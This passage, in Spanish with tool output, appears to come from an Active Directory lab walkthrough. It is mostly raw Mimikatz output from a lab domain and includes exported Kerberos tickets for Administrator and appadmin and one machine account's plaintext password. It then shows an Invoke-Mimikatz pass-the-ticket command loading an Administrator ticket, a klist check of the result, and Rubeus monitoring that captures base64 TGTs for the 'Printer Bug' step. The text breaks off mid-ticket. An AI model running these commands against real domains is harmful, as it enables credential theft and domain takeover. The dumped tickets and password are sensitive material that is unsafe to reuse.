Start/End/MaxRenew: 3/2/2024 3:28:12 PM ; 3/3/2024 1:28:12 AM ; 3/9/2024 3:28:12 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
18d125ff6b7eae889300b7a19212985fcf31df41804e9e54a5960ca77b3080aa
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;5894d2]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5673303 (00000000:00569157)
Session : Network from 0
User Name : Administrator
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:27:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:27:12 PM ; 3/3/2024 1:27:12 AM ; 3/9/2024 3:27:12 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
0cdf7b93381a1d8d1989b0a1def31d6c1fea0528053cb784e8ce4198a67c03d4
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;569157]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5665378 (00000000:00567262)
Session : Network from 0
User Name : Administrator
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:26:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:26:12 PM ; 3/3/2024 1:26:12 AM ; 3/9/2024 3:26:12 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
49829367d874b0821ad9d838590172a7674927d5ad930637ec125a94155ed7ab
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;567262]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5653909 (00000000:00564595)
Session : Network from 0
User Name : appadmin
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:25:54 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:19:27 PM ; 3/3/2024 1:19:26 AM ; 3/9/2024 3:19:26 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
48fd7b2d67275c81b3d55a0668863839889faca9c4236baa54aa62a157031517
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;564595]-2-0-60a10000-appadmin@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 5651775 (00000000:00563d3f)
Session : Network from 0
User Name : Administrator
Domain : dcorp
Logon Server : (null)
Logon Time : 3/2/2024 3:25:12 PM
SID : S-1-5-21-719815819-3726368948-3917688648-500
* Username : Administrator
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 3:25:12 PM ; 3/3/2024 1:25:12 AM ; 3/9/2024 3:25:12 PM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : Administrator ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
09fd65bfe802af8a9a8c7efd8b07e984e42c7a663f3137c48ccba619913fd697
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 744308 (00000000:000b5b74)
Session : RemoteInteractive from 2
User Name : appadmin
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 2/19/2024 11:45:42 PM
SID : S-1-5-21-719815819-3726368948-3917688648-1117
* Username : appadmin
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 3/2/2024 6:47:37 AM ; 3/2/2024 4:47:37 PM ; 3/9/2024 6:47:37 AM
Service Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : ldap ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
83eac06aad96aeeb98fa05fbec1c6ae46c43f4242acc8c7a95214d6d5198f9c5
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;b5b74]-0-0-40a50000-appadmin@ldap-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 6:47:37 AM ; 3/2/2024 4:47:37 PM ; 3/9/2024 6:47:37 AM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : appadmin ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
8a51aeac4d6f41dbf3b4a0521971ef8083deea1faecef88f7e91b2cdf05bedc2
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;b5b74]-2-0-40e10000-appadmin@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Authentication Id : 0 ; 509404 (00000000:0007c5dc)
Session : Interactive from 2
User Name : UMFD-2
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 2/19/2024 11:41:46 PM
SID : S-1-5-96-0-2
* Username : DCORP-APPSRV$
* Domain : dollarcorp.moneycorp.local
* Password : Md9Dq"q!"p2QG3GZyR>9yMw/lo0v)49RA)cj/TAlNinYB$zDGTdU]vUYs1/Bfe?AbXScy#^4_Ani_v"ABGC`hlp,$=Sm?M19un%6QdFsVpR@Pc[xv$W&=< V
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 997 (00000000:000003e5)
Session : Service from 0
User Name : LOCAL SERVICE
Domain : NT AUTHORITY
Logon Server : (null)
Logon Time : 2/19/2024 11:31:00 PM
SID : S-1-5-19
* Username : (null)
* Domain : (null)
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
Authentication Id : 0 ; 999 (00000000:000003e7)
Session : UndefinedLogonType from 0
User Name : DCORP-APPSRV$
Domain : dcorp
Logon Server : (null)
Logon Time : 2/19/2024 11:30:59 PM
SID : S-1-5-18
* Username : dcorp-appsrv$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : cifs ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( dollarcorp.moneycorp.local )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
48d75d73c69a2cf65cff3f8656fa1d26535f1f52e36d92bd90afa851521a9137
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;3e7]-0-0-40a50000-DCORP-APPSRV$@cifs-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
[00000001]
Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
a4a58fc9c51ba8ab93b54094e159d3d04c72a7b3df015c39c6acae0efd7bcab0
Ticket : 0x00000012 - aes256_hmac ; kvno = 1 [...]
* Saved to file [0;3e7]-0-1-40a50000.kirbi !
[00000002]
Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
345feb7e4ce63f3f8570d7d6c2eb0b5727b632fa3c6a24892a8907ce59033e5a
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;3e7]-0-2-40a50000-DCORP-APPSRV$@LDAP-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
[00000003]
Start/End/MaxRenew: 3/2/2024 5:35:48 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : LDAP ; dcorp-dc.dollarcorp.moneycorp.local ; dollarcorp.moneycorp.local ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
9b66315d4af0b7876e8e5eef7cea6e18c0ac5a1b80efb4d47a80f23d1391aa87
Ticket : 0x00000012 - aes256_hmac ; kvno = 13 [...]
* Saved to file [0;3e7]-0-3-40a50000-DCORP-APPSRV$@LDAP-dcorp-dc.dollarcorp.moneycorp.local.kirbi !
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 3/2/2024 6:08:13 AM ; 3/2/2024 3:35:48 PM ; 3/9/2024 5:35:48 AM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (--) : @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( $$Delegation Ticket$$ )
Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
8e84e6efee04a8e9b8ee4f32ad4ef671288f461d736713aa46d7835469e933a5
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e7]-2-0-60a10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
[00000001]
Start/End/MaxRenew: 3/2/2024 3:20:48 PM ; 3/3/2024 1:20:48 AM ; 3/9/2024 5:35:48 AM
Service Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Target Name (02) : krbtgt ; DOLLARCORP.MONEYCORP.LOCAL ; @ DOLLARCORP.MONEYCORP.LOCAL
Client Name (01) : DCORP-APPSRV$ ; @ DOLLARCORP.MONEYCORP.LOCAL ( DOLLARCORP.MONEYCORP.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
08674be3b711292ce24410664db5e24e10343c51bb9c2914680d01ae16b77388
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;3e7]-2-1-40e10000-DCORP-APPSRV$@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi !
Luego podemos verificar los tickets actuales que tenemos cargados.
PS C:\> klist
klist
Current LogonId is 0:0x563ebd
Cached Tickets: (1)
#0> Client: appadmin @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 3/2/2024 15:19:27 (local)
End Time: 3/3/2024 1:19:26 (local)
Renew Time: 3/9/2024 15:19:26 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\>Luego cargamos uno de los tickets de admin.
PS C:\> Invoke-Mimikatz -Command '"kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
.#####. mimikatz 2.2.0 (x64) #19041 Sep 20 2021 19:01:18
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::ptt [0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi
* File: '[0;563d3f]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi': OK
Luego revisamos nuestros tickets
PS C:\> klist
klist
Current LogonId is 0:0x563ebd
Cached Tickets: (1)
#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: krbtgt/DOLLARCORP.MONEYCORP.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
Start Time: 3/2/2024 15:25:12 (local)
End Time: 3/3/2024 1:25:12 (local)
Renew Time: 3/9/2024 15:25:12 (local)
Session Key Type: Kerberos DES-CBC-CRC
Cache Flags: 0x1 -> PRIMARY
Kdc Called:Printer Bug
Iniciamos el modo de escucha en la maquina dcorp-appsrv.
PS C:\> .\Rubeus.exe monitor /interval:5 /nowrap
.\Rubeus.exe monitor /interval:5 /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.1
[*] Action: TGT Monitoring
[*] Monitoring every 5 seconds for new TGTs
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : appadmin@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:19:27 PM
EndTime : 3/3/2024 1:19:26 AM
RenewTill : 3/9/2024 3:19:26 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:54:12 PM
EndTime : 3/3/2024 1:54:12 AM
RenewTill : 3/9/2024 3:54:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
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
[*] 3/2/2024 11:57:37 PM UTC - Found new TGT:
User : Administrator@DOLLARCORP.MONEYCORP.LOCAL
StartTime : 3/2/2024 3:52:12 PM
EndTime : 3/3/2024 1:52:12 AM
RenewTill : 3/9/2024 3:52:12 PM
Flags : name_canonicalize, pre_authent, renewable, forwarded, forwardable
Base64EncodedTicket :
doIGZjCCBmKgAwIBBaEDAgEWooIFNjCCBTJhggUuMIIFKqADAgEFoRwbGkRPTExBUkNPUlAuTU9ORVlDT1JQLkxPQ0FMoi8wLaADAgECoSYwJBsGa3JidGd0GxpET0xMQVJDT1JQLk1PTkVZQ09SUC5MT0NBTKOCBNIwggTOoAMCARKhAwIBAqKCBMAEggS8TUFhv9+VTyNeIzRbnP0hEgIb3fF+zlVgY/QpYKHwUN2xUq4jXwr9xg+BWbGZhN5ekduHVamv5VXtZk/GrVXR54vE9oyL3Xw7wUa6mX2jm+S0Xy5bS9kV5xjiwH7iTJKYP2hZWr7G21qy5xYYH87QQYm8s1GsgC2nUQ+lrBYLGdtLm1hnZK8JWewn5jyyI9WfLtp+45Yw/lrdxxO73LXaqIfFGIeDhFV1aGIpJRllr9Yy6XzydT/Z20l8Sno9vxPrwcVHYfWiSGjvuQqEsymxqinMrrZfjOFVdf7x64eS+cU31yrPiYBYstBEQLWafLrskn+LfP+Lstbj20b0KpOW45cfYJkEwk6yE1uv3kZpERq1H4Y5CxngwyCFeoI9q+SBIdjjD8UlvakpCbCWX3f7kGHUyFu01oLfrVD0phHjh5qqPBj7uBIBpPimf0uwVZ/1eUFFTTUDR3ySNcw5t3/4Z0HAzHfgNiyRnklbEJWcA5xBXcrNQLrZgskae4rRzeN9bUrLLMWDCdbRC7O+skaT6rrSVJp+nMLDP2SV7syUXpj+yF+awoFMaai3f/vWfGjfQ8xc2Zr9v6xNMJhFVfVh31YpO6b1UdL8q0aCI3VPiGQ0r610UShJTtvqqL4mdXrwkxSMyHFkmwC+lcJGRinrA7Sxl/d1dS2diWt2YciTCS9bVOiLhZ22VTZe4vJHkI8h5a5by9F1hGHp5fjBOIfR8Gw0XaD8tBcVzS8FMyPKDBF7GOuN2UmZZudOGQY0qJgzzGSBV78YGxYKYRXdidi+Q7QIkiy7UnR01uHxpL1CLlkSxjcyZFzH2cWjZfFtvwQWIckZVlW18zyLB4RKFMo+uRPYF+MMSIJU/7m4GZQUaqHZrVfUhjXEXa4i4Tdz0X5ZHCouYX5jJbu2VZncYjyxYt/Rbvy6bt/GTfvRzU9sIBnDl8FaCzuDLC/xmAQMGkLGE+V6xCWasBq+ZV3Q8Xgv1gUvYxeSaAHq2f4fC2G38fuaywc/z5GTO7vietzFSC3qPJkkXYx09MFIPxd6np052lyvS94eRoAQwMKo9aGXNMD6Lc7uoybcge3hPU/R8qQpl3guudklg0E9zfIuUrE3IwWihsLKQowAZZg4dvyIVG43zagd32dam5zjXRb24PBzTbc9xp2CGUTcyw6TkfBWHZ+sWHJQEXMKhlAvyCxjiAep2DLkP8UweVpf8Gxe4JXu4uiUZVV1Zhepi4waQDmSkN+93XC+3PqfSc8VL8++K76t5tIWYq